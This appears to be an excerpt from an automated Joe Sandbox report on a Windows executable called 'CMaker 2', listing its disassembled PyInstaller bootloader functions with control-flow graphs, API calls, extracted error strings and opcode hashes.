                                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1010374628-0
                                                                                                                                                                                  • Opcode ID: dbdad111b33b6a5fdb4a43ab8193133b9ed2a6519222c80d6296d74a5515524f
                                                                                                                                                                                  • Instruction ID: 2821749097f311bde980a1aa1fb7a57b0f0633cf781d40bae8a5effa6cfba493
                                                                                                                                                                                  • Opcode Fuzzy Hash: dbdad111b33b6a5fdb4a43ab8193133b9ed2a6519222c80d6296d74a5515524f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0502E461A1D68341FF55AF25A40027A26A4AF02B90F5BE6B9DD7DC67DAFE3DE4018300
                                                                                                                                                                                  Function 00007FF6FABE1000 Relevance: 40.6, APIs: 1, Strings: 22, Instructions: 358COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 7ff6fabe1000-7ff6fabe26f6 call 7ff6fabeacb0 call 7ff6fabf4f00 call 7ff6fabf5220 call 7ff6fabe25a0 10 7ff6fabe2704-7ff6fabe2726 call 7ff6fabe18d0 0->10 11 7ff6fabe26f8-7ff6fabe26ff 0->11 17 7ff6fabe272c-7ff6fabe2743 call 7ff6fabe1bd0 10->17 18 7ff6fabe2836-7ff6fabe284c call 7ff6fabe31a0 10->18 12 7ff6fabe2a5e-7ff6fabe2a79 call 7ff6fabea9b0 11->12 22 7ff6fabe2748-7ff6fabe278c 17->22 25 7ff6fabe2885-7ff6fabe289a call 7ff6fabe1df0 18->25 26 7ff6fabe284e-7ff6fabe287b call 7ff6fabe6870 18->26 23 7ff6fabe2792-7ff6fabe279a 22->23 24 7ff6fabe2981-7ff6fabe2992 22->24 27 7ff6fabe27a0-7ff6fabe27a4 23->27 29 7ff6fabe2994-7ff6fabe2999 call 7ff6fabe7440 24->29 30 7ff6fabe299b-7ff6fabe299d 24->30 45 7ff6fabe2a56 25->45 41 7ff6fabe289f-7ff6fabe28be call 7ff6fabe1bd0 26->41 42 7ff6fabe287d-7ff6fabe2880 call 7ff6fabee444 26->42 32 7ff6fabe295e-7ff6fabe2973 call 7ff6fabe18c0 27->32 33 7ff6fabe27aa-7ff6fabe27c2 call 7ff6fabf51a0 27->33 36 7ff6fabe29a4-7ff6fabe29b6 call 7ff6fabe7040 29->36 30->36 37 7ff6fabe299f call 7ff6fabe75b0 30->37 32->27 52 7ff6fabe2979 32->52 53 7ff6fabe27c4-7ff6fabe27c8 33->53 54 7ff6fabe27cf-7ff6fabe27e7 call 7ff6fabf51a0 33->54 56 7ff6fabe29dd-7ff6fabe29ec 36->56 57 7ff6fabe29b8-7ff6fabe29be 36->57 37->36 63 7ff6fabe28c1-7ff6fabe28ca 41->63 42->25 45->12 52->24 53->54 72 7ff6fabe27f4-7ff6fabe280c call 7ff6fabf51a0 54->72 73 7ff6fabe27e9-7ff6fabe27ed 54->73 60 7ff6fabe2ab3-7ff6fabe2ad2 call 7ff6fabe30c0 56->60 61 7ff6fabe29f2-7ff6fabe2a10 call 7ff6fabe7040 call 7ff6fabe71b0 56->61 58 7ff6fabe29c0-7ff6fabe29c8 57->58 59 7ff6fabe29ca-7ff6fabe29d8 call 7ff6fabf4c1c 57->59 58->59 59->56 75 7ff6fabe2ad4-7ff6fabe2ade call 7ff6fabe3210 60->75 76 7ff6fabe2ae0-7ff6fabe2af1 call 7ff6fabe1bd0 60->76 87 7ff6fabe2a12-7ff6fabe2a15 61->87 88 7ff6fabe2a84-7ff6fabe2a93 call 7ff6fabe7490 61->88 63->63 64 7ff6fabe28cc-7ff6fabe28e9 call 7ff6fabe18d0 63->64 64->22 79 7ff6fabe28ef-7ff6fabe2900 call 7ff6fabe1df0 64->79 72->32 89 7ff6fabe2812-7ff6fabe2824 call 7ff6fabf5260 72->89 73->72 86 7ff6fabe2af6-7ff6fabe2b10 call 7ff6fabe7800 75->86 76->86 79->45 101 7ff6fabe2b12-7ff6fabe2b19 86->101 102 7ff6fabe2b1e-7ff6fabe2b30 SetDllDirectoryW 86->102 87->88 93 7ff6fabe2a17-7ff6fabe2a3e call 7ff6fabe1bd0 87->93 103 7ff6fabe2a95-7ff6fabe2a9c 88->103 104 7ff6fabe2a9e-7ff6fabe2aa1 call 7ff6fabe6e70 88->104 99 7ff6fabe2905-7ff6fabe2917 call 7ff6fabf5260 89->99 100 7ff6fabe282a-7ff6fabe2831 89->100 111 7ff6fabe2a40 93->111 112 7ff6fabe2a7a-7ff6fabe2a82 call 7ff6fabf4c1c 93->112 122 7ff6fabe2922-7ff6fabe2934 call 7ff6fabf5260 99->122 123 7ff6fabe2919-7ff6fabe2920 99->123 100->32 107 7ff6fabe2a47 call 7ff6fabe1df0 101->107 108 7ff6fabe2b32-7ff6fabe2b39 102->108 109 7ff6fabe2b3f-7ff6fabe2b5b call 7ff6fabe57b0 call 7ff6fabe5d20 102->109 103->107 116 7ff6fabe2aa6-7ff6fabe2aa8 104->116 119 7ff6fabe2a4c-7ff6fabe2a4e 107->119 108->109 115 7ff6fabe2c95-7ff6fabe2c9e 108->115 138 7ff6fabe2b5d-7ff6fabe2b63 109->138 139 7ff6fabe2bb6-7ff6fabe2bb9 call 7ff6fabe5760 109->139 111->107 112->86 124 7ff6fabe2ca0-7ff6fabe2ca5 call 7ff6fabe7440 115->124 125 7ff6fabe2ca7-7ff6fabe2ca9 115->125 116->86 126 7ff6fabe2aaa-7ff6fabe2ab1 116->126 119->45 140 7ff6fabe293f-7ff6fabe2958 call 7ff6fabf5260 122->140 141 7ff6fabe2936-7ff6fabe293d 122->141 123->32 130 7ff6fabe2cb0-7ff6fabe2ce2 call 7ff6fabe2590 call 7ff6fabe2240 call 7ff6fabe2560 call 7ff6fabe59d0 call 7ff6fabe5760 124->130 125->130 131 7ff6fabe2cab call 7ff6fabe75b0 125->131 126->107 131->130 143 7ff6fabe2b65-7ff6fabe2b72 call 7ff6fabe57f0 138->143 144 7ff6fabe2b7d-7ff6fabe2b87 call 7ff6fabe5b90 138->144 150 7ff6fabe2bbe-7ff6fabe2bc5 139->150 140->32 141->32 143->144 157 7ff6fabe2b74-7ff6fabe2b7b 143->157 159 7ff6fabe2b92-7ff6fabe2ba0 call 7ff6fabe5ef0 144->159 160 7ff6fabe2b89-7ff6fabe2b90 144->160 150->115 154 7ff6fabe2bcb-7ff6fabe2bd5 call 7ff6fabe22a0 150->154 154->119 167 7ff6fabe2bdb-7ff6fabe2bf0 call 7ff6fabe7420 154->167 162 7ff6fabe2ba9-7ff6fabe2bb1 call 7ff6fabe1df0 call 7ff6fabe59d0 157->162 159->150 172 7ff6fabe2ba2 159->172 160->162 162->139 176 7ff6fabe2bf2-7ff6fabe2bf7 call 7ff6fabe7440 167->176 177 7ff6fabe2bf9-7ff6fabe2bfb 167->177 172->162 178 7ff6fabe2c02-7ff6fabe2c3e call 7ff6fabe7150 call 7ff6fabe71f0 call 7ff6fabe59d0 call 7ff6fabe5760 call 7ff6fabe70f0 176->178 177->178 179 7ff6fabe2bfd call 7ff6fabe75b0 177->179 192 7ff6fabe2c43-7ff6fabe2c45 178->192 179->178 193 7ff6fabe2c82-7ff6fabe2c90 call 7ff6fabe1880 192->193 194 7ff6fabe2c47-7ff6fabe2c55 192->194 193->119 196 7ff6fabe2c57-7ff6fabe2c71 call 7ff6fabe1df0 call 7ff6fabe1880 194->196 197 7ff6fabe2c76-7ff6fabe2c7d call 7ff6fabe1df0 194->197 196->119 197->193
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-runtime-tmpdir
                                                                                                                                                                                  • API String ID: 514040917-560148345
                                                                                                                                                                                  • Opcode ID: 7a4b8ae4a071d55727e07b7db0f97e579a6f8ca809cbe28dea7bbfeb59589f11
                                                                                                                                                                                  • Instruction ID: 130f31fdbc4349918dbaff94314c5bb4cc284975a580dc01475499f0f6d8ae25
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a4b8ae4a071d55727e07b7db0f97e579a6f8ca809cbe28dea7bbfeb59589f11
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C027961A0C68390FF25EB20D8942F923A5AF56784FC451F2DA6EC62D6FF2CE558D310
                                                                                                                                                                                  Function 00007FF6FABE18D0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 204 7ff6fabe18d0-7ff6fabe190b call 7ff6fabe31a0 207 7ff6fabe1ba1-7ff6fabe1bc5 call 7ff6fabea9b0 204->207 208 7ff6fabe1911-7ff6fabe1951 call 7ff6fabe6870 204->208 213 7ff6fabe1b8e-7ff6fabe1b91 call 7ff6fabee444 208->213 214 7ff6fabe1957-7ff6fabe1967 call 7ff6fabeeacc 208->214 218 7ff6fabe1b96-7ff6fabe1b9e 213->218 219 7ff6fabe1981-7ff6fabe199d call 7ff6fabee794 214->219 220 7ff6fabe1969-7ff6fabe197c call 7ff6fabe1db0 214->220 218->207 225 7ff6fabe199f-7ff6fabe19b2 call 7ff6fabe1db0 219->225 226 7ff6fabe19b7-7ff6fabe19cc call 7ff6fabf4c14 219->226 220->213 225->213 231 7ff6fabe19ce-7ff6fabe19e1 call 7ff6fabe1db0 226->231 232 7ff6fabe19e6-7ff6fabe1a67 call 7ff6fabe1bd0 * 2 call 7ff6fabeeacc 226->232 231->213 240 7ff6fabe1a6c-7ff6fabe1a7f call 7ff6fabf4c30 232->240 243 7ff6fabe1a81-7ff6fabe1a94 call 7ff6fabe1db0 240->243 244 7ff6fabe1a99-7ff6fabe1ab2 call 7ff6fabee794 240->244 243->213 249 7ff6fabe1ab4-7ff6fabe1ac7 call 7ff6fabe1db0 244->249 250 7ff6fabe1acc-7ff6fabe1ae8 call 7ff6fabee508 244->250 249->213 255 7ff6fabe1afb-7ff6fabe1b09 250->255 256 7ff6fabe1aea-7ff6fabe1af6 call 7ff6fabe1df0 250->256 255->213 258 7ff6fabe1b0f-7ff6fabe1b1e 255->258 256->213 259 7ff6fabe1b20-7ff6fabe1b26 258->259 261 7ff6fabe1b40-7ff6fabe1b4f 259->261 262 7ff6fabe1b28-7ff6fabe1b35 259->262 261->261 263 7ff6fabe1b51-7ff6fabe1b5a 261->263 262->263 264 7ff6fabe1b6f 263->264 265 7ff6fabe1b5c-7ff6fabe1b5f 263->265 267 7ff6fabe1b71-7ff6fabe1b8c 264->267 265->264 266 7ff6fabe1b61-7ff6fabe1b64 265->266 266->264 268 7ff6fabe1b66-7ff6fabe1b69 266->268 267->213 267->259 268->264 269 7ff6fabe1b6b-7ff6fabe1b6d 268->269 269->267
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                  • API String ID: 840049012-3497178890
                                                                                                                                                                                  • Opcode ID: 31fbc4baec00de1fb27c5009f68031adf4813cd50edda24041016c7100065e53
                                                                                                                                                                                  • Instruction ID: 04fe0394b46b3c1f6f0ce9db7d8b51933c119c72f7c25c432305b1c5e58e16a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 31fbc4baec00de1fb27c5009f68031adf4813cd50edda24041016c7100065e53
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E71D271B0868685EB60CB24E0903F963A1FF5A780F9490F5E9AEC77D9FE6DE5448700
                                                                                                                                                                                  Function 00007FF6FABE15A0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 270 7ff6fabe15a0-7ff6fabe15b1 271 7ff6fabe15b3-7ff6fabe15bc call 7ff6fabe1030 270->271 272 7ff6fabe15d7-7ff6fabe15f1 call 7ff6fabe31a0 270->272 279 7ff6fabe15ce-7ff6fabe15d6 271->279 280 7ff6fabe15be-7ff6fabe15c9 call 7ff6fabe1df0 271->280 277 7ff6fabe15f3-7ff6fabe161a call 7ff6fabe1db0 272->277 278 7ff6fabe161b-7ff6fabe1635 call 7ff6fabe31a0 272->278 286 7ff6fabe1651-7ff6fabe1668 call 7ff6fabeeacc 278->286 287 7ff6fabe1637-7ff6fabe164c call 7ff6fabe1df0 278->287 280->279 293 7ff6fabe168b-7ff6fabe168f 286->293 294 7ff6fabe166a-7ff6fabe1686 call 7ff6fabe1db0 286->294 292 7ff6fabe17a5-7ff6fabe17a8 call 7ff6fabee444 287->292 299 7ff6fabe17ad-7ff6fabe17bf 292->299 296 7ff6fabe1691-7ff6fabe169d call 7ff6fabe11d0 293->296 297 7ff6fabe16a9-7ff6fabe16c9 call 7ff6fabf4c30 293->297 303 7ff6fabe179d-7ff6fabe17a0 call 7ff6fabee444 294->303 304 7ff6fabe16a2-7ff6fabe16a4 296->304 306 7ff6fabe16cb-7ff6fabe16e7 call 7ff6fabe1db0 297->306 307 7ff6fabe16ec-7ff6fabe16f7 297->307 303->292 304->303 315 7ff6fabe1793-7ff6fabe1798 306->315 310 7ff6fabe16fd-7ff6fabe1706 307->310 311 7ff6fabe1786-7ff6fabe178e call 7ff6fabf4c1c 307->311 314 7ff6fabe1710-7ff6fabe1732 call 7ff6fabee794 310->314 311->315 319 7ff6fabe1765-7ff6fabe176c 314->319 320 7ff6fabe1734-7ff6fabe174c call 7ff6fabeeed4 314->320 315->303 322 7ff6fabe1773-7ff6fabe177c call 7ff6fabe1db0 319->322 325 7ff6fabe1755-7ff6fabe1763 320->325 326 7ff6fabe174e-7ff6fabe1751 320->326 329 7ff6fabe1781 322->329 325->322 326->314 328 7ff6fabe1753 326->328 328->329 329->311
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                  • API String ID: 2050909247-1550345328
                                                                                                                                                                                  • Opcode ID: c5ecd4f98c6522e646f86d5e8d3da10d81b6c304669716bf478425d49c864d9e
                                                                                                                                                                                  • Instruction ID: ef82866acc0961129276e843e047cd4436b42a969e2b07fc4e0ad0626a6dd085
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5ecd4f98c6522e646f86d5e8d3da10d81b6c304669716bf478425d49c864d9e
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC518FA1B0864392EB109B15E4801BA23A0FF56B94FD491F1EE2EC77D6FE7CE5548300
                                                                                                                                                                                  Function 00007FF6FABE6E70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F14
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F1A
                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F5C
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7040: GetEnvironmentVariableW.KERNEL32(00007FF6FABE29B0), ref: 00007FF6FABE7077
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7040: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FABE7099
                                                                                                                                                                                    • Part of subcall function 00007FF6FABF7DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF7E05
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                  • API String ID: 365913792-1339014028
                                                                                                                                                                                  • Opcode ID: 3ace134f01f87639eb6351f9f1db5e29782779556c5dab28e5d311e0ab063356
                                                                                                                                                                                  • Instruction ID: f19d115e45f4e5482a0ed08d85c25666350580bbace33afe6a2ee5453af97d60
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ace134f01f87639eb6351f9f1db5e29782779556c5dab28e5d311e0ab063356
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D41C465B1964241FB21EB65E8A02B96261AF877C0FC450F5EE2DC77D6FE3CE5418340
                                                                                                                                                                                  Function 00007FF6FABE71F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                                  • Opcode ID: 0ec6545137c218525aca36a5c69f06ebb26d0c39709c03294cc33139ca873a5f
                                                                                                                                                                                  • Instruction ID: 39d8d0078324366ea93cfb538059ad89458e2f92bd8e413e15ac5f602ef06f01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ec6545137c218525aca36a5c69f06ebb26d0c39709c03294cc33139ca873a5f
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7415372A08B8285EB20DB64F4952AA7361FB95364F944379E6BD837D5EF7CD0448B00
                                                                                                                                                                                  Function 00007FF6FABE11D0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 637 7ff6fabe11d0-7ff6fabe122d call 7ff6fabea1f0 640 7ff6fabe122f-7ff6fabe1256 call 7ff6fabe1df0 637->640 641 7ff6fabe1257-7ff6fabe126f call 7ff6fabf4c30 637->641 646 7ff6fabe1271-7ff6fabe1288 call 7ff6fabe1db0 641->646 647 7ff6fabe128d-7ff6fabe129d call 7ff6fabf4c30 641->647 654 7ff6fabe13e9-7ff6fabe13fe call 7ff6fabe9ed0 call 7ff6fabf4c1c * 2 646->654 652 7ff6fabe129f-7ff6fabe12b6 call 7ff6fabe1db0 647->652 653 7ff6fabe12bb-7ff6fabe12cd 647->653 652->654 656 7ff6fabe12d0-7ff6fabe12f5 call 7ff6fabee794 653->656 669 7ff6fabe1403-7ff6fabe141d 654->669 663 7ff6fabe13e1 656->663 664 7ff6fabe12fb-7ff6fabe1305 call 7ff6fabee508 656->664 663->654 664->663 670 7ff6fabe130b-7ff6fabe1317 664->670 671 7ff6fabe1320-7ff6fabe1348 call 7ff6fabe8630 670->671 674 7ff6fabe134a-7ff6fabe134d 671->674 675 7ff6fabe13c6-7ff6fabe13dc call 7ff6fabe1df0 671->675 676 7ff6fabe134f-7ff6fabe1359 674->676 677 7ff6fabe13c1 674->677 675->663 679 7ff6fabe1384-7ff6fabe1387 676->679 680 7ff6fabe135b-7ff6fabe1369 call 7ff6fabeeed4 676->680 677->675 682 7ff6fabe139a-7ff6fabe139f 679->682 683 7ff6fabe1389-7ff6fabe1397 call 7ff6fac09f10 679->683 684 7ff6fabe136e-7ff6fabe1371 680->684 682->671 686 7ff6fabe13a5-7ff6fabe13a8 682->686 683->682 687 7ff6fabe1373-7ff6fabe137d call 7ff6fabee508 684->687 688 7ff6fabe137f-7ff6fabe1382 684->688 690 7ff6fabe13aa-7ff6fabe13ad 686->690 691 7ff6fabe13bc-7ff6fabe13bf 686->691 687->682 687->688 688->675 690->675 693 7ff6fabe13af-7ff6fabe13b7 690->693 691->663 693->656
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                  • API String ID: 2050909247-2813020118
                                                                                                                                                                                  • Opcode ID: 6607a863c49184fa337af94fa4767ebb549ff6f48f341bbd4ff5e8a9c1792be9
                                                                                                                                                                                  • Instruction ID: e5806725412108f7a44753804c1ca7a812eb49f989eb37a78fb93d9739ef329e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6607a863c49184fa337af94fa4767ebb549ff6f48f341bbd4ff5e8a9c1792be9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 27510562A0868251EB60DB11F4803BA6291BF96794FE841B5ED6EC7BC5FF3CE445C300
                                                                                                                                                                                  Function 00007FF6FABFEBFC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
